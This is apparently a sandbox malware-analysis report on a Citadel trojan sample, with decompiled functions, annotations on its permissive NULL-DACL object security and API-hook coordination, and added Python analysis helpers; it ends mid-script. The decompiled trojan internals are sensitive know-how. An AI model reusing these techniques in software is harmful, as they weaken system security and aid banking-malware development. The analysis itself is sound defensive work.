              NETAPI32.dll | NetUserEnum, NetApiBufferFree, NetUserGetInfo

              Network Behavior

              No network behavior found

              Code Manipulations

              Statistics

              CPU Usage


              Memory Usage


              System Behavior

              General

              Start time: 21:51:29
              Start date: 25/02/2021
              Path: C:\Users\user\Desktop\executable.4080.exe
              Wow64 process (32bit): true
              Commandline: 'C:\Users\user\Desktop\executable.4080.exe'
              Imagebase: 0x400000
              File size: 118784 bytes
              MD5 hash: 9B6886089B69BC227E48ACCB63231096
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Citadel, Description: Yara detected Citadel, Source: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Citadel, Description: Yara detected Citadel, Source: 00000000.00000000.197550286.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
              Reputation: low

              Disassembly

              Code Analysis


                Execution Graph

                Execution Coverage: 0.7%
                Dynamic/Decrypted Code Coverage: 4.5%
                Signature Coverage: 15.7%
                Total number of Nodes: 560
                Total number of Limit Nodes: 5

                Graph

                [Execution graph: interactive call-graph rendering (560 nodes, 5 limit nodes) of function addresses and the Windows API calls they reach; not reproduced as text]

                Executed Functions

                Control-flow Graph

                [Control-flow graph: interactive rendering of the basic blocks of the function at 0x40779b-0x407935, with executed and not-executed blocks highlighted; not reproduced as text]
                C-Code - Quality: 92%
                			E0040779B(void* __ecx, void* __edx, void* __edi, signed char _a4) {
                				char _v441;
                				char _v748;
                				char _v756;
                				void* __esi;
                				void* _t16;
                				signed int _t19;
                				signed int _t20;
                				signed int _t21;
                				void** _t22;
                				void** _t24;
                				signed int _t26;
                				signed int _t28;
                				signed int _t29;
                				signed int _t31;
                				long _t39;
                				void* _t41;
                				void* _t43;
                				void* _t44;
                				signed int _t47;
                
                				_t44 = __edi;
                				_t43 = __edx;
                				_t41 = __ecx;
                				_t47 = _a4 & 0x00000001;
                				_t39 = 0;
                				if(_t47 == 0) {
                					 *0x4192d0 = _t39;
                				}
                				if(E004073D9(_t43, _a4) != 0) {
                					_t16 = HeapCreate(_t39, 0x80000, _t39); // executed
                					 *0x41a570 = _t16;
                					__eflags = _t16 - _t39;
                					if(_t16 != _t39) {
                						 *0x41a569 = 1;
                					} else {
                						 *0x41a570 = GetProcessHeap();
                						 *0x41a569 = _t39;
                					}
                					 *0x419ba0 = _t39;
                					 *0x41a568 = _t39;
                					InitializeCriticalSection(0x419188);
                					 *0x4191a0 = _t39; // executed
                					__imp__#115(0x202,  &_v748); // executed
                					_t19 = E0040750F(_a4, _t41, _t44, _t47);
                					__eflags = _t19;
                					if(_t19 == 0) {
                						goto L3;
                					} else {
                						_t21 = E00407589(_a4);
                						__eflags = _t21;
                						if(_t21 == 0) {
                							goto L3;
                						} else {
                							_t22 = E0040F311(_t41, 0xffffffff, 0x4192e0);
                							 *0x4192d4 = _t22;
                							__eflags = _t22 - _t39;
                							if(_t22 == _t39) {
                								goto L3;
                							} else {
                								 *0x4192d8 = GetLengthSid( *_t22);
                								_t24 =  *0x4192d4; // 0x201f7d0
                								 *0x4192dc = E0040B855( *_t24, _t23);
                								_t26 = E004075D7(_t25, _a4);
                								__eflags = _t26;
                								if(_t26 == 0) {
                									goto L3;
                								} else {
                									 *0x419544 = GetCurrentProcessId();
                									 *0x419548 = _t39;
                									__eflags = _t47 - _t39;
                									if(_t47 != _t39) {
                										_t28 = 1;
                									} else {
                										_t28 = E00407639();
                									}
                									__eflags = _t28 - _t39;
                									if(_t28 == _t39) {
                										goto L3;
                									} else {
                										__eflags = _t47 - _t39;
                										if(_t47 == _t39) {
                											E00407B53( &_v756);
                											E0040E9AF(L"{F0CFCAE1-4272-0517-A2A0-B1E71D94040E}", 0x41954c,  *0x4192dc,  &_v441, _t39);
                										}
                										_t29 = E0040768B(_a4);
                										__eflags = _t29;
                										if(_t29 == 0) {
                											goto L3;
                										} else {
                											__eflags = _a4 & 0x00000002;
                											 *0x41a580 = _t39;
                											L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig\\adyq.cik" = 0;
                											L"SOFTWARE\\Microsoft\\Qodit" = 0;
                											 *0x41aad8 = 0;
                											L"SOFTWARE\\Microsoft\\Qodit" = 0;
                											L"Global\\{66B478CA-F059-936C-A2A0-B1E71D94040E}" = 0;
                											L"SOFTWARE\\Microsoft\\Qodit" = 0;
                											if(__eflags == 0) {
                												_t31 = 1;
                											} else {
                												_t31 = E00407728(_t44, __eflags);
                											}
                											__eflags = _t31 - _t39;
                											_t14 = _t31 != _t39;
                											__eflags = _t14;
                											_t20 = _t31 & 0xffffff00 | _t14;
                										}
                									}
                								}
                							}
                						}
                					}
                				} else {
                					L3:
                					_t20 = 0;
                				}
                				return _t20;
                			}

                APIs
                • HeapCreate.KERNELBASE(00000000,00080000,00000000,00000000,?,00000000), ref: 004077D4
                • GetProcessHeap.KERNEL32(?,00000000), ref: 004077E3
                • InitializeCriticalSection.KERNEL32(00419188,?,00000000), ref: 0040780E
                • WSAStartup.WS2_32(00000202,?), ref: 00407824
                • GetLengthSid.ADVAPI32(00000000,000000FF,004192E0,00000000,?,00000000), ref: 0040785D
                • GetCurrentProcessId.KERNEL32(00000000,0201F7D0,00000000,?,00000000), ref: 0040788A
                Strings
                • SOFTWARE\Microsoft\Qodit, xrefs: 0040791A
                • C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik, xrefs: 004078FC
                • Global\{66B478CA-F059-936C-A2A0-B1E71D94040E}, xrefs: 00407914
                • SOFTWARE\Microsoft\Qodit, xrefs: 00407902
                • SOFTWARE\Microsoft\Qodit, xrefs: 0040790E
                • {F0CFCAE1-4272-0517-A2A0-B1E71D94040E}, xrefs: 004078CC
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: HeapProcess$CreateCriticalCurrentInitializeLengthSectionStartup
                • String ID: C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik$Global\{66B478CA-F059-936C-A2A0-B1E71D94040E}$SOFTWARE\Microsoft\Qodit$SOFTWARE\Microsoft\Qodit$SOFTWARE\Microsoft\Qodit${F0CFCAE1-4272-0517-A2A0-B1E71D94040E}
                • API String ID: 2528102454-1264117554
                • Opcode ID: 2aadc0eb9814a50c60d7bd768e57fd36b68328fba7501129c4850c3bd16490ec
                • Instruction ID: e472fa0b51f4d27c8a70246af906feb6cb263db6039360773b08a0fcf8211e10
                • Opcode Fuzzy Hash: 2aadc0eb9814a50c60d7bd768e57fd36b68328fba7501129c4850c3bd16490ec
                • Instruction Fuzzy Hash: 4841EF70808240BECB11AF64EC85AD93BA5AB04398B04857BE948F72F1E7396C91D71F
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 73%
                			E0040DB47(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
                				struct _ACL* _v8;
                				struct _SECURITY_DESCRIPTOR* _v12;
                				int _v16;
                				int _v20;
                				void** _t16;
                				struct _SECURITY_DESCRIPTOR* _t25;
                				intOrPtr* _t26;

                				// __edi: the caller's SECURITY_DESCRIPTOR (0x419318 in the APIs list below); __esi: optional SECURITY_ATTRIBUTES to fill in.
                				_t26 = __esi;
                				_t25 = __edi;
                				// InitializeSecurityDescriptor(sd, SECURITY_DESCRIPTOR_REVISION == 1), then SetSecurityDescriptorDacl(sd, bDaclPresent == TRUE, pDacl == NULL, FALSE):
                				// a present-but-NULL DACL grants every principal full access to any object created with this descriptor.
                				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
                					return 0;
                				} else {
                					// Arguments are pushed right to left: ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", SDDL_REVISION_1, &_v12, NULL).
                					// The SDDL is a SACL with a single mandatory-label ACE: label Low (LW) with policy NR|NW|NX, so only subjects below Low integrity
                					// are refused; a low-integrity process (for example a browser tab running in protected mode) can open the object.
                					_push(0);
                					_t16 =  &_v12;
                					_push(_t16);
                					_push(1);
                					_push(L"S:(ML;;NRNWNX;;;LW)"); // executed
                					L00415950(); // executed (import thunk for ConvertStringSecurityDescriptorToSecurityDescriptorW, ref 0040DB78)
                					if(_t16 != 0) { // the value tested is the call's BOOL result in eax, which the decompiler still renders as _t16
                						_v8 = 0;
                						// Copy the SACL out of the self-relative descriptor in _v12 into the caller's absolute descriptor.
                						// _v12 is released only on failure: on success the SACL pointer handed to SetSecurityDescriptorSacl still points into that buffer.
                						if(GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v8, _v16) == 0) {
                							LocalFree(_v12);
                						}
                					}
                					// Fill SECURITY_ATTRIBUTES: nLength == 12, lpSecurityDescriptor == sd, bInheritHandle == FALSE. The APIs list places the descriptor at
                					// 0x419318 and _entry_ passes 0x41930c (12 bytes below it) to CreateMutexW/CreateEventW, consistent with this structure being that argument.
                					if(_t26 != 0) {
                						 *_t26 = 0xc;
                						 *(_t26 + 4) = _t25;
                						 *((intOrPtr*)(_t26 + 8)) = 0;
                					}
                					return 1;
                				}
                			}

                • Address column: 0x0040db47 .. 0x0040dbca (per-line addresses of the E0040DB47 code above; the column was detached from the code lines in this export)
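The SDDL string in E0040DB47 is what makes its descriptor interesting: the object gets no DACL and a Low mandatory label, so any subject at Low integrity or above can open whatever is created with it. The script below, added here as a worked example and not code from the sample or from any analysis tool, parses the SDDL subset involved (O:/G:/D:/S: sections, six-field ACEs, ML label SIDs, the NO_ACCESS_CONTROL spelling of a NULL ACL) and applies the mandatory-integrity rule to a subject's integrity level. It uses only the Python standard library; the descriptor strings it is exercised with and the subject level names are constructed for the example.

```python
"""Parse the SDDL subset used for mandatory-label SACL entries and evaluate the
integrity check they impose. Added example; not code from the sample or from any tool."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# SDDL abbreviations for the mandatory-label SIDs S-1-16-<level>.
LABEL_LEVELS: Dict[str, int] = {"LW": 0x1000, "ME": 0x2000, "HI": 0x3000, "SI": 0x4000}
LEVEL_NAMES: Dict[int, str] = {0x0: "Untrusted", 0x1000: "Low", 0x2000: "Medium", 0x3000: "High", 0x4000: "System"}
# Integrity levels a subject (process token) can run at; Untrusted has no SDDL label abbreviation.
SUBJECT_LEVELS: Dict[str, int] = {"untrusted": 0x0, "low": 0x1000, "medium": 0x2000, "high": 0x3000, "system": 0x4000}
# Label policy flags: access kinds refused to subjects whose level is *below* the label.
POLICY_TO_ACCESS: Dict[str, str] = {"NR": "read", "NW": "write", "NX": "execute"}
NULL_ACL_FLAG = "NO_ACCESS_CONTROL"   # SDDL spelling of a NULL (absent) ACL


@dataclass
class Ace:
    ace_type: str     # "A" allow, "D" deny, "ML" mandatory label, ...
    flags: str
    rights: str       # for ML ACEs the concatenated policy flags, e.g. "NRNWNX"
    object_guid: str
    inherit_guid: str
    sid: str          # "WD", "LW", ... or a literal S-1-... string


@dataclass
class SecurityDescriptor:
    owner: Optional[str] = None
    group: Optional[str] = None
    dacl_flags: str = ""
    sacl_flags: str = ""
    dacl: Optional[List[Ace]] = None   # None: NULL DACL (everyone full access); []: empty DACL (no access)
    sacl: Optional[List[Ace]] = None


_SECTION = re.compile(r"(O|G|D|S):")
_ACE = re.compile(r"\(([^()]*)\)")


def _parse_acl(body: str) -> Tuple[str, Optional[List[Ace]]]:
    """Split an ACL section body into its flag prefix and its parenthesised ACEs."""
    cut = body.find("(")
    flags = body if cut < 0 else body[:cut]
    if flags == NULL_ACL_FLAG:
        return flags, None
    aces: List[Ace] = []
    for m in _ACE.finditer(body):
        fields = m.group(1).split(";")
        if len(fields) != 6:
            raise ValueError("unsupported ACE (expected 6 fields): (%s)" % m.group(1))
        aces.append(Ace(*[f.strip() for f in fields]))
    return flags, aces


def parse_sddl(text: str) -> SecurityDescriptor:
    """Parse an SDDL string into its sections; sections that are absent stay None."""
    sd = SecurityDescriptor()
    markers = list(_SECTION.finditer(text))
    if not markers or markers[0].start() != 0:
        raise ValueError("SDDL must begin with O:, G:, D: or S:")
    for i, m in enumerate(markers):
        end = markers[i + 1].start() if i + 1 < len(markers) else len(text)
        body, kind = text[m.end():end], m.group(1)
        if kind == "O":
            sd.owner = body
        elif kind == "G":
            sd.group = body
        elif kind == "D":
            sd.dacl_flags, sd.dacl = _parse_acl(body)
        else:
            sd.sacl_flags, sd.sacl = _parse_acl(body)
    return sd


def label_policy(sd: SecurityDescriptor) -> Tuple[int, Set[str]]:
    """(label level, access kinds denied below it). Objects without an ML ACE carry
    Windows' implicit label: Medium with no-write-up."""
    for ace in sd.sacl or []:
        if ace.ace_type == "ML":
            if ace.sid not in LABEL_LEVELS:
                raise ValueError("unknown label SID %r" % ace.sid)
            chunks = [ace.rights[i:i + 2] for i in range(0, len(ace.rights), 2)]
            if any(c not in POLICY_TO_ACCESS for c in chunks):
                raise ValueError("unknown label policy %r" % ace.rights)
            return LABEL_LEVELS[ace.sid], {POLICY_TO_ACCESS[c] for c in chunks}
    return LABEL_LEVELS["ME"], {"write"}


def mandatory_check(sd: SecurityDescriptor, subject: str, access: str) -> bool:
    """The integrity check performed before the DACL is consulted: a subject at or above
    the label always passes it; a subject below the label is refused the policy's access kinds."""
    level, denied = label_policy(sd)
    if SUBJECT_LEVELS[subject] >= level:
        return True
    return access not in denied


def describe(sd: SecurityDescriptor) -> str:
    """One-line summary of what the descriptor means for access."""
    level, denied = label_policy(sd)
    if sd.dacl is None:
        dacl = "NULL DACL (every principal gets full access)"
    elif not sd.dacl:
        dacl = "empty DACL (no principal gets access)"
    else:
        dacl = "%d DACL ACE(s)" % len(sd.dacl)
    return "%s; label %s, refuses %s to lower-integrity subjects" % (
        dacl, LEVEL_NAMES[level], "/".join(sorted(denied)) or "nothing")


if __name__ == "__main__":
    # The sample's own string: no D: section, one Low label ACE.
    print(describe(parse_sddl("S:(ML;;NRNWNX;;;LW)")))
    print(describe(parse_sddl("D:(A;;GA;;;WD)")))
```

Two distinctions matter when reading a descriptor this way. An absent D: section (or D:NO_ACCESS_CONTROL) is a NULL DACL, which is what E0040DB47 produces by passing a NULL pointer with bDaclPresent set, and it grants everything; "D:" followed by no ACEs is an empty DACL and grants nothing. And an object with no ML ACE is not unlabeled: Windows treats it as Medium with no-write-up, which is why the sample has to set an explicit Low label before a low-integrity process can write to, or signal, its objects.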

                APIs
                • InitializeSecurityDescriptor.ADVAPI32(00419318,00000001,00000000,00000000,00407832,?,00000000), ref: 0040DB51
                • SetSecurityDescriptorDacl.ADVAPI32(00419318,00000001,00000000,00000000,?,00000000), ref: 0040DB62
                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 0040DB78
                • GetSecurityDescriptorSacl.ADVAPI32(?,00000000,00000000,?,?,00000000), ref: 0040DB93
                • SetSecurityDescriptorSacl.ADVAPI32(00419318,00000000,00000000,?,?,00000000), ref: 0040DBA7
                • LocalFree.KERNEL32(?,?,00000000), ref: 0040DBB4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
                • String ID: S:(ML;;NRNWNX;;;LW)
                • API String ID: 2050860296-820036962
                • Opcode ID: 01d9340cc45710f5766464196f2030191e88dcccf6cdd7b37e5e192805b1d4d2
                • Instruction ID: b6c36742903de2a9131d8955831316b6987f175f24bb6198c5f2eea010f3ba00
                • Opcode Fuzzy Hash: 01d9340cc45710f5766464196f2030191e88dcccf6cdd7b37e5e192805b1d4d2
                • Instruction Fuzzy Hash: 8E113C75900209FAEF119FE18D85EAFBBBDAF00740F10447AF552B11A0E7B59A449A28
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 0 407f7f-407f98 call 40779b 3 407f9e-407fc3 SetErrorMode GetCommandLineW CommandLineToArgvW 0->3 4 4082cf-4082d8 ExitProcess 0->4 5 407fc5-407fca 3->5 6 407ffd-408011 call 40b046 3->6 8 407ff6-407ff7 LocalFree 5->8 9 407fcc-407fd1 5->9 13 408013-408028 call 407d04 call 40b0ee 6->13 14 40802d-408034 6->14 8->6 11 407ff0-407ff4 9->11 12 407fd3-407fd7 9->12 11->8 11->9 12->11 15 407fd9-407fe0 12->15 13->14 17 4080d2-4080d6 14->17 18 40803a-408044 call 4088a3 14->18 19 407fe2-407fe5 15->19 20 407fec 15->20 21 4082a9-4082b6 call 4097f7 17->21 22 4080dc-4080ed call 407a11 17->22 18->21 32 40804a-40806d call 4079d9 CreateMutexW 18->32 19->11 25 407fe7-407fea 19->25 20->11 21->4 35 4082b8-4082bf 21->35 33 4080f3-408121 call 4079d9 OpenMutexW 22->33 34 408298-40829c 22->34 25->11 41 408079 32->41 42 40806f-408077 call 40dd2d 32->42 47 408150-408162 IsWellKnownSid 33->47 48 408123-408124 CloseHandle 33->48 34->21 40 40829e-4082a4 call 40ea63 34->40 35->4 37 4082c1-4082ce Sleep 35->37 40->21 46 40807c-40807f 41->46 42->46 46->21 50 408085-4080b1 call 413bf3 call 4079d9 OpenEventW 46->50 52 408171-408182 ReadProcessMemory 47->52 53 408164-40816c call 408c33 47->53 51 40812a-40813b ReadProcessMemory 48->51 74 4080b3-4080bb SetEvent CloseHandle 50->74 75 4080bd-4080cd call 407dda CloseHandle 50->75 55 408143-40814e Sleep 51->55 56 40813d-408141 51->56 58 408184-408188 52->58 59 4081de-408202 call 410c3b call 4085f2 52->59 67 408290-408293 call 40dd1d 53->67 55->51 56->47 56->55 58->59 60 40818a-40819d GetFileAttributesExW 58->60 77 408205-408209 59->77 60->59 64 40819f-4081dc call 410c3b call 40895a VirtualFree 60->64 64->77 67->34 74->75 75->21 77->67 80 40820f-40822b call 40f5c2 77->80 80->67 84 40822d-40825c call 4079d9 CreateEventW 80->84 87 408267-40826e WaitForMultipleObjects 84->87 88 40825e-408265 WaitForSingleObject 84->88 89 408274-408277 87->89 88->89 90 408282-40828e CloseHandle * 2 89->90 91 408279-40827c CloseHandle 89->91 90->67 
91->90
                C-Code - Quality: 85%
                			_entry_(signed int __ecx, void* __edx, void* __edi, void* __eflags) {
                				void* __ebx;
                				void* __esi;
                				void* __ebp;
                				void* _t75;
                				void* _t81;
                				void* _t83;
                				void* _t84;
                				void* _t85;
                				void* _t90;
                				intOrPtr* _t91;
                				void* _t93;
                				void* _t95;
                				void* _t99;
                				void* _t103;
                				int _t111;
                				int _t120;
                				signed int _t152;
                				void* _t155;
                				void* _t160;
                				void* _t162;
                
                				_t153 = __edi;
                				_t146 = __ecx;
                				_t160 = _t162 - 0x78;
                				 *(_t160 + 0x77) = 0;
                				_t75 = E0040779B(__ecx, __edx, __edi, 0); // executed
                				if(_t75 == 0) {
                					L50:
                					__eflags =  *(_t160 + 0x77);
                					_t74 =  *(_t160 + 0x77) == 0;
                					__eflags = _t74;
                					ExitProcess(0 | _t74);
                				}
                				 *((char*)(_t160 + 0x5c)) = 0; // set to 1 by a "-f" argument (loop at L3 below); later passed on to L0040895A
                				 *((char*)(_t160 + 0x76)) = 1; // cleared by a "-n" argument; if still 1 at exit, E0040EA63 runs (L45 below)
                				SetErrorMode(0x8007); // SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOALIGNMENTFAULTEXCEPT | SEM_NOOPENFILEERRORBOX: no error dialogs
                				_t81 = CommandLineToArgvW(GetCommandLineW(), _t160 + 0x6c); // _t81 = argv, argc is stored at _t160+0x6c
                				if(_t81 == 0) {
                					L11:
                					_push(_t153);
                					_t157 = _t160 + 0x60;
                					_t83 = E0040B046(0, _t146, _t160 + 0x60,  *0x41932c);
                					_t174 = _t83;
                					if(_t83 != 0) {
                						_t146 =  *(_t160 + 0x60);
                						E00407D04( *(_t160 + 0x64),  *(_t160 + 0x60), _t174, _t160 + 0x6c, _t160 + 0x70);
                						E0040B0EE(_t157);
                					}
                					if( *(_t160 + 0x70) != 0x1e6) {
                						__eflags =  *(_t160 + 0x70) - 0xc;
                						if( *(_t160 + 0x70) != 0xc) {
                							L47:
                							_t84 = E004097F7( *(_t160 + 0x6c));
                							if( *(_t160 + 0x77) == 0 || ( *0x4192d0 & 0x00000002) == 0) {
                								goto L50;
                							} else {
                								Sleep(0xffffffff);
                								return _t84;
                							}
                						}
                						_t85 = E00407A11(_t146, 0x8789347b, 2);
                						 *(_t160 + 0x70) = _t85;
                						__eflags = _t85;
                						if(_t85 == 0) {
                							L45:
                							__eflags =  *((char*)(_t160 + 0x76)) - 1;
                							if( *((char*)(_t160 + 0x76)) == 1) {
                								E0040EA63(0, _t153, _t157,  *0x41932c);
                							}
                							goto L47;
                						}
                						// E004079D9 builds the object name used below from the constant 0x19367400 into the stack buffer at _t160-0x18 (every mutex/event name here comes from this helper).
                						E004079D9(0x19367400, _t160 - 0x18, 1);
                						_t90 = OpenMutexW(0x100000, 0, _t160 - 0x18); // SYNCHRONIZE access; success means another instance already created this mutex
                						_t157 = GetFileAttributesExW; // address of the API whose first byte is inspected below
                						_t153 = ReadProcessMemory;
                						__eflags = _t90;
                						if(_t90 == 0) {
                							L29:
                							_t91 =  *0x4192d4; // 0x201f7d0
                							// 0x16 == WinLocalSystemSid: is the SID stored at 0x4192d4 the LocalSystem SID? The next test reads the BOOL result in eax, which the decompiler still renders as _t91.
                							__imp__IsWellKnownSid( *_t91, 0x16);
                							__eflags = _t91 - 1;
                							if(_t91 != 1) {
                								// Not LocalSystem: read the first byte of GetFileAttributesExW in this process (0xffffffff is the GetCurrentProcess() pseudo-handle).
                								 *(_t160 + 0x77) = 0;
                								_t93 = ReadProcessMemory(0xffffffff, _t157, _t160 + 0x77, 1, 0);
                								__eflags = _t93;
                								if(_t93 == 0) {
                									L35:
                									_push( *( *(_t160 + 0x6c)));
                									_t153 = L004085F2;
                									_t95 = E00410C3B(_t146, L004085F2,  *((intOrPtr*)( *(_t160 + 0x6c) + 4)));
                									_t157 = L"C:\\Users\\Jamey\\AppData\\Roaming";
                									 *(_t160 + 0x77) = L004085F2(_t95, 0, L"C:\\Users\\Jamey\\AppData\\Roaming", _t160 - 0x220, L004085F2, L"C:\\Users\\Jamey\\AppData\\Roaming");
                									L36:
                									__eflags =  *(_t160 + 0x77) - 1;
                									if( *(_t160 + 0x77) == 1) {
                										_t99 = E0040F5C2(_t160 - 0x220, 0, _t157, 0, _t160 + 0x4c);
                										__eflags = _t99;
                										 *(_t160 + 0x77) = _t99 != 0;
                										__eflags =  *(_t160 + 0x77);
                										if( *(_t160 + 0x77) != 0) {
                											E004079D9(0x2a43533f, _t160 - 0x18, 1); // same name constant as the OpenEventW/SetEvent pair in the 0x1e6 path below
                											_t103 = CreateEventW(0x41930c, 1, 0, _t160 - 0x18); // manual-reset, initially unsignaled, SECURITY_ATTRIBUTES at 0x41930c
                											_t157 =  *(_t160 + 0x4c);
                											 *(_t160 + 0x64) = _t103;
                											 *(_t160 + 0x68) = _t157;
                											_push(0xffffffff); // INFINITE timeout for either wait below
                											__eflags = _t103;
                											if(_t103 != 0) {
                												WaitForMultipleObjects(2, _t160 + 0x64, 0, ??); // bWaitAll == FALSE: returns as soon as the event or the handle from +0x4c is signaled
                											} else {
                												WaitForSingleObject(_t157, ??);
                											}
                											__eflags =  *(_t160 + 0x64);
                											if( *(_t160 + 0x64) != 0) {
                												CloseHandle( *(_t160 + 0x64));
                											}
                											_t153 = CloseHandle;
                											CloseHandle( *(_t160 + 0x50));
                											CloseHandle(_t157);
                										}
                									}
                									L44:
                									E0040DD1D( *(_t160 + 0x70));
                									goto L45;
                								}
                								// 0xE9 is the x86 opcode for JMP rel32: a first byte of 0xE9 means GetFileAttributesExW carries an inline hook.
                								__eflags =  *(_t160 + 0x77) - 0xe9;
                								if( *(_t160 + 0x77) != 0xe9) {
                									goto L35;
                								}
                								// Only reached when the API is hooked. 0x78f16360 is not a valid GET_FILEEX_INFO_LEVELS value (the only documented one is
                								// GetFileExInfoStandard == 0), so this call is meaningful only to the hook, which hands back a buffer through the third
                								// argument; that buffer is released below with VirtualFree(..., MEM_RELEASE == 0x8000).
                								_t111 = GetFileAttributesExW(L"{F0CFCAE1-4272-0517-A2A0-B1E71D94040E}", 0x78f16360, _t160 + 0x68);
                								__eflags = _t111 - 1;
                								if(_t111 != 1) {
                									goto L35;
                								}
                								_push( *( *(_t160 + 0x6c)));
                								_t153 = L0040895A;
                								E00410C3B(_t146, L0040895A,  *((intOrPtr*)( *(_t160 + 0x6c) + 8)));
                								// The "-f" flag (+0x5c) is forwarded to L0040895A together with the returned buffer and the %APPDATA% path.
                								_push( *((intOrPtr*)(_t160 + 0x5c)));
                								_t157 = L"C:\\Users\\Jamey\\AppData\\Roaming";
                								_push(_t160 - 0x220);
                								 *(_t160 + 0x77) = L0040895A(_t160 - 0x220, 0,  *(_t160 + 0x68), L"C:\\Users\\Jamey\\AppData\\Roaming", __eflags);
                								VirtualFree( *(_t160 + 0x68), 0, 0x8000);
                								goto L36;
                								goto L36;
                							}
                							 *(_t160 + 0x77) = E00408C33();
                							goto L44;
                						}
                						CloseHandle(_t90);
                						// The mutex already existed, so another instance is running: poll the first byte of GetFileAttributesExW every
                						// 500 ms (0x1f4) until it is 0xE9 (JMP rel32), i.e. until an inline hook has been placed on it in this process,
                						// then continue at L29 with the hooked API.
                						while(1) {
                							 *(_t160 + 0x77) = 0;
                							_t120 = ReadProcessMemory(0xffffffff, _t157, _t160 + 0x77, 1, 0);
                							__eflags = _t120;
                							if(_t120 == 0) {
                								goto L28;
                							}
                							__eflags =  *(_t160 + 0x77) - 0xe9;
                							if( *(_t160 + 0x77) == 0xe9) {
                								goto L29;
                							}
                							L28:
                							Sleep(0x1f4);
                						}
                					}
                					// Reached when the value E00407D04 stored at _t160+0x70 equals 0x1e6 (see the comparison above).
                					if(E004088A3(_t146,  *(_t160 + 0x6c)) != 0) {
                						E004079D9(0x38901130, _t160 - 0x18, 1);
                						// CreateMutexW(&sa, bInitialOwner == TRUE, name): sa is the SECURITY_ATTRIBUTES at 0x41930c; its descriptor at 0x419318 is the one
                						// E0040DB47 builds with a NULL DACL and a Low integrity label, so the mutex is openable from any integrity level down to Low.
                						if(CreateMutexW(0x41930c, 1, _t160 - 0x18) == 0) {
                							 *(_t160 + 0x70) = 0;
                						} else {
                							 *(_t160 + 0x70) = E0040DD2D(_t125);
                						}
                						if( *(_t160 + 0x70) != 0) {
                							E00413BF3();
                							// OpenEventW(EVENT_MODIFY_STATE == 2, FALSE, name) + SetEvent: the name constant 0x2a43533f is the one the other path uses for
                							// CreateEventW/WaitForMultipleObjects, so this releases an instance blocked in that wait.
                							E004079D9(0x2a43533f, _t160 - 0x18, 1);
                							_t155 = OpenEventW(2, 0, _t160 - 0x18);
                							if(_t155 != 0) {
                								SetEvent(_t155);
                								CloseHandle(_t155);
                							}
                							E00407DDA(1);
                							 *(_t160 + 0x77) = 1; // exit-status flag: L50 calls ExitProcess(0 | (flag == 0)), so 1 here means exit code 0
                							CloseHandle( *(_t160 + 0x70));
                						}
                					}
                					goto L47;
                					}
                					goto L47;
                				}
                				_t152 = 0;
                				if( *(_t160 + 0x6c) <= 0) {
                					L10:
                					LocalFree(_t81);
                					goto L11;
                				} else {
                					goto L3;
                				}
                				// Command-line scan (argv in _t81, argc at _t160+0x6c): an argument starting with '-' (0x2d) is checked on its second
                				// wide character: 'f' (0x66) sets the flag at +0x5c, 'n' (0x6e) clears the flag at +0x76; anything else is ignored.
                				do {
                					L3:
                					_t146 =  *(_t81 + _t152 * 4);
                					if(_t146 != 0 &&  *_t146 == 0x2d) {
                						_t146 =  *(_t146 + 2) & 0x0000ffff;
                						if(_t146 == 0x66) {
                							 *((char*)(_t160 + 0x5c)) = 1;
                						} else {
                							if(_t146 == 0x6e) {
                								 *((char*)(_t160 + 0x76)) = 0;
                							}
                						}
                					}
                					_t152 = _t152 + 1;
                				} while (_t152 <  *(_t160 + 0x6c));
                				goto L10;
                			}

                • Address column: 0x00407f7f .. 0x004082d8 (per-line addresses of the _entry_ code above; the column was detached from the code lines in this export)
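The entry function above decides whether its API hook is in place with a single-byte read: if GetFileAttributesExW starts with 0xE9 it is treated as hooked, otherwise it polls. The classifier below, added here as a worked example and not code from the sample or from any tool, generalizes that check the way an analyst examining a memory dump would want it: it decodes the common 32-bit entry-point trampolines (JMP rel32, JMP rel8, JMP [abs32], PUSH/RET, MOV EAX/JMP EAX), resolves the destination, and uses a module map to tell a jump that leaves the owning module from a stub that stays inside it. The module names, base addresses and prologue bytes are constructed test data; 0x74B5F9B0 is the GetFileAttributesExW address the sandbox logged as the ReadProcessMemory source argument.

```python
"""Classify the first instruction of an API prologue to decide whether it has been
inline-hooked. Added example for the 0xE9 check in _entry_; not code from the sample
or from any tool. Modules, addresses and byte strings below are constructed test data
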